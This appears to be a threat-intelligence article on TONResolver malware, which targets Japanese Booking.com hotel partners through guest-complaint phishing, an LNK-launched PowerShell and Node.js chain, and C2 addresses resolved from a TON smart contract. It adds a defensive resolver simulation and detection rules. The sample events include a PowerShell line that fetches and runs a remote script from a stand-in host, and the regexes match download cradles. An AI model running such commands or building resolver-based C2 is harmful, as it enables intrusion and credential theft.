TONResolver Malware Targets Booking.com Partners in Japan

Guest complaints usually demand immediate attention from hospitality staff, and attackers recently exploited that urgency. They targeted Booking.com partners across Japan with emails posing as dissatisfied guests and instructed hotel staff to open what were presented as photographs or complaint documents. Doing so triggered the TONResolver infection chain.
Phishing Tactics and Evasion Strategies
Trend Micro researchers discovered the attacks in late May 2026. The perpetrators ran mass phishing campaigns alongside a more targeted scheme that used Gmail accounts. In the targeted variant, the attacker first sent a benign inquiry containing no links, waited for the hotel employee to reply, and only then forwarded the malicious URL. Opening a conversation before delivering anything suspicious lowered the chance that the payload would be questioned.
The Infection Sequence
Compromise began when the victim clicked the link, which downloaded a ZIP archive. Inside was an LNK shortcut disguised as an image file. Running the shortcut launched a PowerShell command that fetched a second-stage script, quietly dropped a Node.js runtime, and executed the JavaScript-based TONResolver malware on the machine.
Decentralized Command and Control
TONResolver's command-and-control design is its distinctive feature. The malware does not hardcode a server address; it retrieves the address from a TON blockchain smart contract. If defenders block the active server, the operators update the contract and infected systems automatically resolve and contact the new address. Because the contract lives on a public chain that only its owner can write to, defenders cannot seize or rewrite the pointer, and blocking a single observed server does not sever the connection. The practical consequence is that egress controls have to cover the resolution layer, not just the current C2.
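The following simulation, added here and not code from the report or the malware, models the resolver pattern above: the implant reads its C2 address from a record that only the operator can update, and an egress policy decides which destinations are reachable. It is deliberately abstract, with no TON or TonAPI calls; the resolver endpoint name and all addresses are hypothetical. It contrasts two defensive responses: blocking the observed C2 (the operator rotates the record and the implant recovers) versus blocking the resolver endpoint itself.

```python
"""Dead-drop resolver model: the implant never stores the C2 address.
Constructed simulation for illustration; nothing here talks to TON."""
from dataclasses import dataclass, field


class Blocked(Exception):
    """Raised when the egress policy denies a destination."""


@dataclass
class Resolver:
    """Stands in for the smart contract: anyone may read the record,
    only the holder of the owner secret may update it."""
    owner_secret: str
    c2: str

    def get_c2(self) -> str:
        return self.c2

    def set_c2(self, secret: str, new_c2: str) -> None:
        if secret != self.owner_secret:
            raise PermissionError("only the contract owner may update the C2")
        self.c2 = new_c2


@dataclass
class Egress:
    """Host firewall or proxy policy: a set of denied destinations."""
    denied: set = field(default_factory=set)

    def check(self, dest: str) -> None:
        if dest in self.denied:
            raise Blocked(dest)


# Hypothetical name for the API endpoint through which the record is read.
RESOLVER_HOST = "resolver.example"


@dataclass
class Implant:
    resolver: Resolver
    egress: Egress

    def beacon(self) -> str:
        # Step 1: reach the resolver endpoint and read the current pointer.
        self.egress.check(RESOLVER_HOST)
        c2 = self.resolver.get_c2()
        # Step 2: contact whatever address the record holds right now.
        self.egress.check(c2)
        return c2


def attempt(implant: Implant) -> str:
    try:
        return implant.beacon()
    except Blocked as dest:
        return f"blocked:{dest}"


def scenario_block_c2_only() -> list:
    """Defender blocks the observed C2; operator rotates the record; implant recovers."""
    resolver = Resolver(owner_secret="operator-key", c2="c2-a.example")
    egress = Egress()
    implant = Implant(resolver, egress)
    out = [attempt(implant)]                      # first beacon succeeds
    egress.denied.add("c2-a.example")             # defender blocks what they saw
    out.append(attempt(implant))                  # implant is cut off ...
    resolver.set_c2("operator-key", "c2-b.example")  # ... until the operator rotates
    out.append(attempt(implant))                  # and it recovers without any update
    return out


def scenario_block_resolver() -> list:
    """Defender blocks the resolver endpoint; rotation no longer helps the operator."""
    resolver = Resolver(owner_secret="operator-key", c2="c2-a.example")
    implant = Implant(resolver, Egress({RESOLVER_HOST}))
    out = [attempt(implant)]
    resolver.set_c2("operator-key", "c2-b.example")
    out.append(attempt(implant))
    return out


if __name__ == "__main__":
    print("block C2 only:  ", scenario_block_c2_only())
    print("block resolver: ", scenario_block_resolver())
```

Blocking only the observed server yields a brief outage followed by recovery, while denying the resolver endpoint stops every beacon regardless of how often the record is rotated. The model assumes a single resolver endpoint; a real implant may fall back to several public API gateways, so the deny rule has to cover all of them, which is why the mitigation below targets TON and TonAPI access as a class.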
Persistence and Data Exfiltration
After launch, TONResolver establishes persistence through the Windows Startup folder and sends a system profile to the server: computer name, user details, memory, processor and MAC address. It then polls the command server every twenty seconds. This first stage did not itself steal files, but it gave the operators remote command execution: they could download additional payloads and run PowerShell scripts on the host.
Escalation and Mitigation Strategies
In one observed sequence, the malicious Node.js process downloaded an executable that targeted the Google Chrome and Microsoft Edge user-data directories, where saved passwords, cookies, browsing history and bookmarks are stored. Researchers therefore linked the activity to credential theft.
To reduce the risk, organizations should block workstation access to TON and TonAPI endpoints unless there is a business need, restrict or alert on PowerShell processes that make outbound network connections, and monitor for Node.js executing from user-writable directories such as the user profile, AppData or Temp. Companies partnering with Booking.com should also review their incident response procedures against this scenario.
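The detection logic below is an added example, not code from the report, covering the infection chain and the monitoring recommendations above: PowerShell launched from Explorer (an LNK double-click) that pulls content from the network, Node.js running from a user-writable directory, Node.js spawning PowerShell or a freshly dropped executable, and a fixed-interval beacon. It runs over constructed Sysmon-style process-creation and network-connection records; the paths, hostnames and TEST-NET addresses are made up for the example.

```python
"""Detection rules for an LNK -> PowerShell -> Node.js chain with a periodic beacon.
Sample events are constructed for this example, not real telemetry."""
import re
from statistics import pstdev

# User-writable locations a legitimate Node.js install would not run from.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\"
    r"|^[a-z]:\\(temp|windows\\temp)\\",
    re.IGNORECASE,
)
# PowerShell command lines that fetch or decode remote content.
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|invoke-restmethod|\birm\b|\s-e(nc|ncodedcommand)?\s",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_processes(events):
    """Return (rule, pid) alerts. Each event has pid, ppid, image, cmdline;
    the parent image is resolved through ppid within the same batch."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        # Rule 1: Node.js runtime started from a user-writable directory.
        if image == "node.exe" and USER_WRITABLE.search(e["image"]):
            alerts.append(("node_from_user_dir", e["pid"]))
        # Rule 2: PowerShell spawned by Explorer (LNK click) that downloads or decodes.
        if image in SHELLS and parent_image == "explorer.exe" and PS_DOWNLOAD.search(e["cmdline"]):
            alerts.append(("explorer_powershell_download", e["pid"]))
        # Rule 3: node.exe acting as a launcher for a shell or a dropped executable.
        if parent_image == "node.exe" and (image in SHELLS or USER_WRITABLE.search(e["image"])):
            alerts.append(("node_spawns_child", e["pid"]))
    return alerts


def detect_beacon(connections, max_jitter=2.0, min_hits=5):
    """Flag (image, dest) pairs whose connection timestamps recur at a steady interval.
    connections: iterable of (seconds, image_path, destination). Returns {pair: period}."""
    by_pair = {}
    for ts, image, dest in connections:
        by_pair.setdefault((basename(image), dest), []).append(ts)
    flagged = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:          # low jitter => machine-driven polling
            flagged[pair] = round(sum(gaps) / len(gaps))
    return flagged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": PS,
     "cmdline": 'powershell.exe -w hidden -c "iwr http://stage.invalid/s.ps1 | iex"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\front-desk\AppData\Local\Temp\node\node.exe",
     "cmdline": "node.exe main.js"},
    {"pid": 400, "ppid": 300, "image": PS, "cmdline": "powershell.exe -enc AAAA"},
    {"pid": 500, "ppid": 300, "image": r"C:\Users\front-desk\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe"},
    {"pid": 600, "ppid": 1, "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "node.exe server.js"},  # legitimate install: must not fire
]
SAMPLE_CONNECTIONS = [  # constructed; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
    (t, r"C:\Users\front-desk\AppData\Local\Temp\node\node.exe", "203.0.113.10:443")
    for t in (0.0, 20.0, 40.5, 60.0, 79.8, 100.0)
] + [
    (t, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "198.51.100.5:443")
    for t in (0.0, 7.0, 31.0, 34.0, 90.0)
]

if __name__ == "__main__":
    for alert in detect_processes(SAMPLE_EVENTS):
        print("ALERT", *alert)
    for (image, dest), period in detect_beacon(SAMPLE_CONNECTIONS).items():
        print(f"BEACON {image} -> {dest} every ~{period}s")
```

Rule 1 is the direct form of the Node.js monitoring recommended above; rules 2 and 3 tie the stages of the chain together through parent-child relationships so that a single event in isolation is not enough to alert. The beacon check keys on jitter rather than on the twenty-second figure observed here, so it also catches an operator who changes the polling interval.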